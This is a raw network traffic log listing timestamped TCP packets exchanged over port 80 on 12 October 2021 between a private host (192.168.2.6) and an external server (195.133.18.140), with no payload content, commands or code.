Oct 12, 2021 12:35:37.736955881 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736955881 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736975908 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.736989021 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.736995935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.737013102 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.737016916 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.737039089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.737041950 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.737061024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.737081051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.737112999 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.737123966 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.737133980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.822369099 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.850735903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850766897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850789070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850811005 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850841045 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850863934 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850887060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850912094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850914001 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.850938082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850960016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.850980997 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.850984097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851006985 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851006985 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851030111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851052046 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851052999 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851073980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851099968 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851100922 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851144075 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851150036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851174116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851176977 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851197958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851221085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851244926 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851247072 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851269960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851294994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851319075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851320982 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851345062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851349115 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851367950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851391077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851413965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851433992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851437092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851461887 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851463079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851489067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851490974 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851510048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851533890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851535082 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851557016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851581097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851603031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851603031 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851630926 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851655006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851677895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851695061 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851701021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851731062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851754904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851773024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851793051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851815939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851816893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851836920 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851840019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851844072 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851865053 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851888895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851891994 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851912975 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851936102 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851963043 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.851967096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.851993084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852014065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852025032 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852036953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852054119 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852055073 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852072954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852098942 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852118969 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852122068 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852144957 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852154970 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852170944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852200031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852200985 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852225065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852243900 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852247953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852272034 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852294922 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852303028 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852318048 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852341890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852364063 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852369070 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852391958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852416039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852438927 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852442980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852463007 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852487087 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852509022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852514029 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852534056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852559090 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852576017 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852596998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852606058 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852622032 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852641106 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852647066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852669954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852693081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852705002 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852716923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852740049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852765083 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852780104 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852791071 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852814913 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852826118 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852838039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852860928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852864027 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852884054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852896929 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852905989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852931023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852951050 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.852955103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.852982044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853007078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853029966 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853030920 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853053093 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853072882 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853075981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853099108 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853108883 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853121996 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853146076 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853149891 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853173018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853189945 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853198051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853220940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853243113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853247881 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853266954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853288889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853312016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853319883 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853336096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853362083 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853374958 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853387117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853409052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853425980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853431940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.853470087 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.853507042 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880362034 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880436897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880460024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880472898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880498886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880501986 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880523920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880546093 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880569935 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880575895 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880587101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880608082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880611897 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880630970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880631924 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880654097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880655050 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880675077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880676985 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880697012 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880697966 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880719900 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880723000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880743980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880752087 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880765915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880767107 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880789042 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880794048 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880810976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880814075 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880835056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880846024 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880857944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880867004 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880881071 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880888939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880902052 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880913019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880933046 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880937099 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880954027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880958080 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880975962 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.880984068 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.880999088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881004095 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881021976 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881023884 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881045103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881053925 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881069899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881078959 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881094933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881113052 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881117105 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881138086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881141901 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881159067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881175041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881182909 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881197929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881222010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881222963 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881246090 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881249905 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881263971 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881267071 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881288052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881310940 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881325006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881347895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881359100 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881372929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881388903 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881403923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881426096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881453037 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881458998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881469965 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881484985 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881495953 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881509066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881516933 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881531954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881539106 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881553888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881563902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881576061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881592035 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881597996 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881618977 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881625891 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881633997 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881649971 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881665945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881685972 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881717920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881717920 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881737947 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881753922 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881762028 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881778002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881800890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881819010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881822109 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881839037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881860018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881880999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881901979 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881902933 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881922960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881926060 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881947041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881951094 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881973028 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.881980896 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.881994009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882006884 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882014990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882041931 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882045031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882065058 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882066011 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882086992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882090092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882111073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882113934 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882134914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882143974 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882160902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882170916 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882184029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882193089 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882205963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882220030 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882227898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882249117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882250071 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882271051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882277966 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882291079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882313967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882327080 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882338047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882345915 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882359982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882375002 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882380009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882395983 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882401943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882421970 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882425070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882451057 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882472992 CEST	80	49749	195.133.18.140	192.168.2.6
